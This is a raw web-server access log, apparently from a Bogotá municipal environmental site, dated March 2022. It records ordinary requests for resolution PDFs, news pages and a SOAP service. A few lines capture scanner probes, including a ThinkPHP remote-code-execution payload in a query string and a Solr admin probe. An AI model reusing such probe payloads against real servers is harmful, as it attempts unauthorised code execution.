181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.62.149.79 - - [12/Mar/2022:11:56:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.62.149.79 - - [12/Mar/2022:11:56:10 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12171
181.62.149.79 - - [12/Mar/2022:11:56:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.62.149.79 - - [12/Mar/2022:11:56:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.62.149.79 - - [12/Mar/2022:11:56:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.62.149.79 - - [12/Mar/2022:11:56:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.62.149.79 - - [12/Mar/2022:11:56:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.62.149.79 - - [12/Mar/2022:11:56:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.62.149.79 - - [12/Mar/2022:11:56:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.62.149.79 - - [12/Mar/2022:11:56:12 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.62.149.79 - - [12/Mar/2022:11:56:13 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
181.62.149.79 - - [12/Mar/2022:11:56:13 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
181.62.149.79 - - [12/Mar/2022:11:56:13 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
181.62.149.79 - - [12/Mar/2022:11:56:15 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
181.62.149.79 - - [12/Mar/2022:11:56:15 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
181.62.149.79 - - [12/Mar/2022:11:56:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 233335
181.62.149.79 - - [12/Mar/2022:11:56:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0209.pdf HTTP/1.1" 200 252131
181.51.106.11 - - [12/Mar/2022:11:56:29 -0500] "GET /catalogoisis/ HTTP/1.1" 404 211
181.51.106.11 - - [12/Mar/2022:11:56:29 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
40.77.167.1 - - [12/Mar/2022:11:56:48 -0500] "GET /bla/resoluciones/resoluciones%202021/1332.pdf HTTP/1.1" 200 935100
40.77.167.1 - - [12/Mar/2022:11:56:58 -0500] "GET /bla/resoluciones/resoluciones%202021/1591.pdf HTTP/1.1" 200 449912
190.13.80.226 - - [12/Mar/2022:11:58:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.13.80.226 - - [12/Mar/2022:11:58:07 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.13.80.226 - - [12/Mar/2022:11:58:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
117.57.58.205 - - [12/Mar/2022:11:58:27 -0500] "GET / HTTP/1.1" 200 319
40.77.167.55 - - [12/Mar/2022:11:58:45 -0500] "GET /bla/resoluciones/resoluciones%202021/3708.pdf HTTP/1.1" 200 346844
66.220.149.117 - - [12/Mar/2022:12:00:08 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html?fbclid=IwAR2QVHr9kZRqza-JQln3FjoxJfqgv16w0i_eRN4fGm3eJO85ibU4069mDho HTTP/1.1" 200 1078
216.245.221.92 - - [12/Mar/2022:12:00:22 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.159 - - [12/Mar/2022:12:00:45 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
201.221.172.4 - - [12/Mar/2022:12:00:54 -0500] "GET /BLA/resoluciones/AUTOS%202011/2588.pdf HTTP/1.1" 200 384815
185.156.72.3 - - [12/Mar/2022:12:01:35 -0500] "\x03" 400 226
3.86.82.77 - - [12/Mar/2022:12:02:20 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [12/Mar/2022:12:01:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
157.55.39.214 - - [12/Mar/2022:12:02:59 -0500] "GET /bla/resoluciones/autos%202014/3624.pdf HTTP/1.1" 200 167650
54.227.45.157 - - [12/Mar/2022:12:05:09 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.245.221.92 - - [12/Mar/2022:12:05:22 -0500] "HEAD / HTTP/1.1" 200 -
186.28.15.180 - - [12/Mar/2022:12:05:29 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
40.88.21.235 - - [12/Mar/2022:12:05:32 -0500] "GET / HTTP/1.1" 200 319
40.88.21.235 - - [12/Mar/2022:12:05:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
173.252.95.22 - - [12/Mar/2022:12:06:34 -0500] "GET /juntos-cuidamos-bogota-mas-de-65-kilogramos-de-residuos-especiales-y-peligrosos-fueron-recolectados-en-engativa.html HTTP/1.1" 206 994
217.182.171.12 - - [12/Mar/2022:12:06:51 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202010/1675.pdf HTTP/1.1" 200 -
181.51.31.89 - - [12/Mar/2022:12:07:15 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.27.23.175 - - [12/Mar/2022:12:09:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 319933
216.245.221.92 - - [12/Mar/2022:12:10:22 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Mar/2022:12:11:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
191.156.129.248 - - [12/Mar/2022:12:15:31 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.221.172.4 - - [12/Mar/2022:12:16:54 -0500] "GET /BLA/resoluciones/AUTOS%202015/3526.pdf HTTP/1.1" 200 1702708
201.221.172.4 - - [12/Mar/2022:12:17:01 -0500] "GET /BLA/resoluciones/AUTOS%202015/2313.pdf HTTP/1.1" 200 775072
207.46.13.110 - - [12/Mar/2022:12:18:03 -0500] "GET /portaldeninos/2021/04/28/dia-internacional-de-concienciacion-sobre-el-ruido-por-una-ciudad-mas-tranquila-y-sostenible/ HTTP/1.1" 200 102970
216.245.221.92 - - [12/Mar/2022:12:18:11 -0500] "HEAD / HTTP/1.1" 200 -
45.146.165.37 - - [12/Mar/2022:12:19:25 -0500] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 1018
201.245.197.109 - - [12/Mar/2022:12:19:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0513.pdf HTTP/1.1" 200 340247
201.245.197.109 - - [12/Mar/2022:12:19:55 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [12/Mar/2022:12:20:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43870
157.55.39.214 - - [12/Mar/2022:12:22:00 -0500] "GET /bla/resoluciones/resoluciones%202021/3713.pdf HTTP/1.1" 200 398626
201.245.192.253 - - [12/Mar/2022:12:21:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45967
200.122.226.45 - - [12/Mar/2022:12:22:46 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 200 1264
201.245.192.253 - - [12/Mar/2022:12:22:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
181.61.206.105 - - [12/Mar/2022:12:23:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [12/Mar/2022:12:23:10 -0500] "HEAD / HTTP/1.1" 200 -
201.221.172.4 - - [12/Mar/2022:12:23:13 -0500] "GET /BLA/resoluciones/AUTOS%202020/4542.pdf HTTP/1.1" 200 388750
191.95.162.169 - - [12/Mar/2022:12:23:37 -0500] "GET /alcaldesa-claudia-lopez-les-dio-la-bienvenida-a-las-sembradoras-por-la-reactivaccion.html HTTP/1.1" 200 1264
201.221.172.4 - - [12/Mar/2022:12:23:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/6150.pdf HTTP/1.1" 200 446434
186.102.85.218 - - [12/Mar/2022:12:23:52 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/lCyEgxyaS4NIH+bVIFDS3KF4ydIthHjxAqbkF3q44zYjNvzrZ+enk&y=U2FsdGVkX1/xxSqJqhIcBjDKKP4EvvS1ok0cKK9iuwpy/JUGCxX3EslN3gxOLBZx HTTP/1.1" 200 31
186.102.85.218 - - [12/Mar/2022:12:24:17 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX192RfCprEO+hU/YPFnEbZd0CDcQFrRIcfP/tQu/AKCLWIoDy2PcNsyv&y=U2FsdGVkX18w9B/WHuGhkLErW9KKatRTl4IG64AsEoFw22o7wQDrG16491tn1bA+ HTTP/1.1" 200 31
186.102.85.218 - - [12/Mar/2022:12:24:20 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/nSS+kLAtC66FfMH5iVQy0m40ygHeiLJ6h27qZqldhD7JMimqvkhl5&y=U2FsdGVkX19J7gppLdHygXC0ruG1jlDgQQtFzLnusTrBmsBivfxGZbFllM1i0sBv HTTP/1.1" 200 31
173.252.95.5 - - [12/Mar/2022:12:24:22 -0500] "GET /images/Memo1.jpg HTTP/1.1" 200 91151
201.221.172.4 - - [12/Mar/2022:12:24:52 -0500] "GET /BLA/resoluciones/AUTOS%202016/3236.pdf HTTP/1.1" 200 373186
186.102.85.218 - - [12/Mar/2022:12:25:02 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19FantLzIp9lP2w534hvRw7XchFFKO+Mne4W/uBn0mNOEcroUGUCjxG&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 30
186.102.85.218 - - [12/Mar/2022:12:25:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18HBz00UEuJD+6aJYjmIcYBUCr76KyjsC76oc/oJje/iKt4MvLC8kGuivmL7GTJNtWpHKjRaii9ZUUlISKT+8lVL3lb5UpU8os=&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 97
186.102.85.218 - - [12/Mar/2022:12:25:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+63WAKRcRbi27kwAVmrNUBvs6RGI4ttvT4ZTHx+zpVsNK83eO76z16oL8GyFFx5/+cMPBUQ5Bv3lfsAhi1DMI7vhiSG97QEJ6bIHIGpwAx7WdggfGJT40FZVzzQQyIf62aFBx/VLTMaer/iHaIC9vbxFmiYGSKGV3Z6fA+l2BtbpkM4g+7NvaVQRvYFECvqk1ZizXTsOYtSlBBj2jP89H4JvfrbIW+Cr3haE+LNZIhupGWUj1+3Jzd+QH5q5Q/SDUSynfA2nBohloNE1trDVVbC4YIvOLjFIcAmyLkaMYV1ux/q+Jja+tTCSdCSoXKtyCzXgZX5BA3/15p1JZ9efItl1hfaPTzBzgydwcsTxSYOkuuEEJkcUcrwAYu1I6v1J4e/odaEHDRUvQ7Tq4PHSG1athcjOu7/k/6q2EGU4ACeeTpFowHlj/c6SG3Cq/0d1D/h0fD9wUdS9VY0TocXJx7KGhCnwE7KU9q3JW+kUxqqxWtZpPwf8bcsJjQZ8xu5JMUxZoZr4XkdRgA1V+43vttuy1jTZlXDBleBm8FIPM3mloKBjClauyuY76Jnxkjk5wz58frdCV3zW96VS9z6ZCq4sO6lYblUrwvHRa0ocBtEet9aU7JFVN+ysRx1x84TXfiWIofghdslRqXQgbigs0l9+xBBXpL4ZEydLs59Bkbo2o/bIrsKaZ6TZtUcAdK2H5qj3FTiGUplm68W3oCnDb2f0qDKLsWV/WVj317hWmo6oOF+wsMc8D8s41qXWesoDfV3ehL3dD5YlhUnRwpLzYmk5YKvIoS2Zo3f05mBBKPOGpUmBPIknWaO8k91/VQ7IOjLGqCey0Z2cJOEnGgJYozR2uYggNZCsWPO1e4lkksU1gNo0GpGHsuJnDkGaejkuU6AewBukGN0Dje/E3Llnj1qthLuB4uWGc4eZ6olMpLcs2MfhgV3CJbUDy05y1DMfMER96nv4oN0O4ym9wHuewYnXIOeL1GCOxDBEPc0bJrfOETi2VXppGeCNSjQSlWeoaW/H71jJT/9NoSY/L7Oj73AUAsaTi4vYFnZChS8r2S8O8Ec27cfHbg1M5feXRkJo79sgkJ+wHsnWoFw3NR1Vhk1ey9i4iKGzk=&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 2039
186.102.85.218 - - [12/Mar/2022:12:25:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19R6BEC3bU5j1eh8Kt9SQuklPHiya6wZkMXX2kQaxVRyKT1iXpYa7MN&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 70
186.102.85.218 - - [12/Mar/2022:12:25:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18pH9XA8VPs0FUH3l2wXee87+fI0sAVRWAbdLMt44l4HRACO6+FY3ml&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 70
186.102.85.218 - - [12/Mar/2022:12:25:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX199AJhqT1BPLvPlRytIf9nZafRdUbRPcoA4HBZJqJg2n46SQ5fRgMOS&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 70
186.102.85.218 - - [12/Mar/2022:12:25:03 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+IGXZB6uOUzkGbibZDloXhjdXAugE+uPL2ZCjR/kelOgNYiH/Y6gbH&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 70
186.102.85.218 - - [12/Mar/2022:12:25:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/ne+wneeyiHF1Zt/En3i0OUAdInrcUYWkROB/tGX7m/FtizcZC5+FJ&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 70
186.102.85.218 - - [12/Mar/2022:12:25:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18sD9WMPJECx3J9DDib8+hkr+iGk/+/XO1nI52cfbglAsNDjqMpdtGx&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 70
186.102.85.218 - - [12/Mar/2022:12:25:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+rzbEKJ99Q94YmJ1F6AhbcpQcHMz/9cjuTTaHTqCJn4FkUArj14/pb&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 70
186.102.85.218 - - [12/Mar/2022:12:25:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/km1ZozoboQ+C5RyHBArcR2pNW5IGmSTHCuwSiH/Rxfnd8pQd+ltBCTipepEch4eeZKGElsFlw2hwMx2nET/idiAV2pLxC++76Hoa/qfOvJJ4OwEii9a1lTnbzNZfvWvEgN+pFitZa6FSQ0uutLc+y+GR+Gg94o6ZRcmDP5e/2EPij2g8A5zVqidSJMea6tJiz3E3vXiGZo77jhnGk5ckrsRr4H/gf1pqA6WwiBjohtPMNHbhgYMVjINCX9Z62356ii55l4hsoZbkCOsa9Ru3yHgnOjcaJgRrfXXb1N+D5rXxbahCcv6s/c+fTqBgTo5RHhte8m7j+IgVCA4R9ZB+PvWSD/vStzf8=&u=U2FsdGVkX19eYm79YgnZzY0S2tFu+uuAHVtm7kMha7v+l3Okx6Z4glixvryO1gdE&y=U2FsdGVkX19RBs6NSH4CgR2HXHVZvMlQL+i6DN7dgZaWkwGWjJlDj8WBaOpiAJ7h HTTP/1.1" 200 196
186.102.85.218 - - [12/Mar/2022:12:25:04 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19FantLzIp9lP2w534hvRw7XchFFKO+Mne4W/uBn0mNOEcroUGUCjxG HTTP/1.1" 200 30975
201.245.197.109 - - [12/Mar/2022:12:25:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2287.pdf HTTP/1.1" 200 359383
40.77.167.55 - - [12/Mar/2022:12:25:37 -0500] "GET /bla/resoluciones/resoluciones%202021/1339.pdf HTTP/1.1" 200 510206
191.95.51.99 - - [12/Mar/2022:12:27:22 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
191.95.46.166 - - [12/Mar/2022:12:27:35 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.123 - - [12/Mar/2022:12:27:53 -0500] "GET /bla/resoluciones/resoluciones%202021/2874.pdf HTTP/1.1" 200 343210
216.245.221.92 - - [12/Mar/2022:12:28:10 -0500] "HEAD / HTTP/1.1" 200 -
181.55.174.83 - - [12/Mar/2022:12:29:41 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html?fbclid=IwAR21sKt_ZmioBquLq7z48ZF_3mG9IVWaPbOj_jdv2rXM8xd2mVMijOV7iMc HTTP/1.1" 200 1078
186.28.209.35 - - [12/Mar/2022:12:30:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [12/Mar/2022:12:30:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [12/Mar/2022:12:30:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43870
201.245.192.253 - - [12/Mar/2022:12:31:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45967
201.245.192.253 - - [12/Mar/2022:12:31:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
173.252.95.3 - - [12/Mar/2022:12:33:09 -0500] "GET /images/jardines-verticales-4-marzo.jpg HTTP/1.1" 200 54804
173.252.95.9 - - [12/Mar/2022:12:33:10 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 206 1078
173.252.95.29 - - [12/Mar/2022:12:33:10 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 206 1078
216.245.221.92 - - [12/Mar/2022:12:33:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.197.109 - - [12/Mar/2022:12:34:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1207.pdf HTTP/1.1" 200 687263
186.30.177.142 - - [12/Mar/2022:12:35:50 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html HTTP/1.1" 200 1078
66.249.66.85 - - [12/Mar/2022:12:35:51 -0500] "-" 408 -
191.109.166.16 - - [12/Mar/2022:12:36:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [12/Mar/2022:12:38:10 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.157 - - [12/Mar/2022:12:38:34 -0500] "GET /bla/resoluciones/resoluciones%202021/3104.pdf HTTP/1.1" 200 1577461
173.252.127.12 - - [12/Mar/2022:12:39:42 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
31.13.127.119 - - [12/Mar/2022:12:39:43 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.111.116 - - [12/Mar/2022:12:41:33 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.127.116 - - [12/Mar/2022:12:41:33 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
31.13.127.21 - - [12/Mar/2022:12:41:33 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.111.116 - - [12/Mar/2022:12:41:33 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.111.116 - - [12/Mar/2022:12:41:33 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.79.20 - - [12/Mar/2022:12:41:33 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.127.28 - - [12/Mar/2022:12:41:35 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
173.252.83.7 - - [12/Mar/2022:12:41:35 -0500] "GET /images/liberacion-aves-10-marzo.jpg HTTP/1.1" 200 55386
201.245.192.253 - - [12/Mar/2022:12:40:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43870
201.245.192.253 - - [12/Mar/2022:12:41:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 116195
201.245.192.253 - - [12/Mar/2022:12:41:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45967
216.245.221.92 - - [12/Mar/2022:12:43:10 -0500] "HEAD / HTTP/1.1" 200 -
45.146.165.37 - - [12/Mar/2022:12:44:10 -0500] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 1018
45.137.21.141 - - [12/Mar/2022:12:44:39 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
181.61.4.229 - - [12/Mar/2022:12:45:25 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
87.250.224.125 - - [12/Mar/2022:12:47:07 -0500] "-" 408 -
103.93.176.74 - - [12/Mar/2022:12:47:10 -0500] "GET / HTTP/1.1" 200 319
5.255.253.150 - - [12/Mar/2022:12:47:12 -0500] "-" 408 -
95.108.213.56 - - [12/Mar/2022:12:47:18 -0500] "-" 408 -
173.231.60.194 - - [12/Mar/2022:12:47:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201301-1350%2F&sort=name&order=asc HTTP/1.1" 200 12365
157.55.39.214 - - [12/Mar/2022:12:47:23 -0500] "GET /bla/resoluciones/resoluciones%202021/1200.pdf HTTP/1.1" 200 425345
95.108.213.40 - - [12/Mar/2022:12:47:24 -0500] "-" 408 -
173.231.60.194 - - [12/Mar/2022:12:47:28 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201351-1400%2F&sort=name&order=asc HTTP/1.1" 200 12367
69.171.231.2 - - [12/Mar/2022:12:47:32 -0500] "GET /caminos-de-los-cerros-estaran-cerrados-este-fin-de-semana-en-bogota.html HTTP/1.1" 206 813
173.231.60.194 - - [12/Mar/2022:12:47:34 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201401-1450%2F&sort=name&order=asc HTTP/1.1" 200 12367
5.255.253.154 - - [12/Mar/2022:12:47:39 -0500] "-" 408 -
173.231.60.194 - - [12/Mar/2022:12:47:40 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201451-1500%2F&sort=name&order=asc HTTP/1.1" 200 12370
173.231.60.194 - - [12/Mar/2022:12:47:45 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201501-1550%2F&sort=name&order=asc HTTP/1.1" 200 12370
173.231.60.194 - - [12/Mar/2022:12:47:52 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201551-1600%2F&sort=name&order=asc HTTP/1.1" 200 12369
95.108.213.26 - - [12/Mar/2022:12:47:54 -0500] "-" 408 -
173.231.60.194 - - [12/Mar/2022:12:47:58 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201601-1650%2F&sort=name&order=asc HTTP/1.1" 200 12366
173.231.60.194 - - [12/Mar/2022:12:48:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201651-1700%2F&sort=name&order=asc HTTP/1.1" 200 12354
173.231.60.194 - - [12/Mar/2022:12:48:09 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201701-1751%2F&sort=name&order=asc HTTP/1.1" 200 12369
216.245.221.92 - - [12/Mar/2022:12:48:10 -0500] "HEAD / HTTP/1.1" 200 -
173.231.60.194 - - [12/Mar/2022:12:48:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201751-1800%2F&sort=name&order=asc HTTP/1.1" 200 12368
173.231.60.194 - - [12/Mar/2022:12:48:22 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201801-1850%2F&sort=name&order=asc HTTP/1.1" 200 12357
186.86.33.140 - - [12/Mar/2022:12:48:23 -0500] "-" 408 -
5.255.231.245 - - [12/Mar/2022:12:48:24 -0500] "-" 408 -
173.231.60.194 - - [12/Mar/2022:12:48:28 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201851-1900%2F&sort=name&order=asc HTTP/1.1" 200 12364
40.77.167.55 - - [12/Mar/2022:12:48:29 -0500] "GET /bla/resoluciones/resoluciones%202021/1534.pdf HTTP/1.1" 200 393856
173.231.60.194 - - [12/Mar/2022:12:48:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201901-1950%2F&sort=name&order=asc HTTP/1.1" 200 12360
173.252.95.22 - - [12/Mar/2022:12:48:40 -0500] "GET /andrea-murcia-la-creadora-del-primer-hogar-de-paso-para-perros-y-gatos-en-un-colegio.html?fbclid=IwAR17mW-cSWdLgTA1FbRXsgodAQ6HrOtfBzSW7nv2Y0nOiceF4WEiQTAQ_xM HTTP/1.1" 200 973
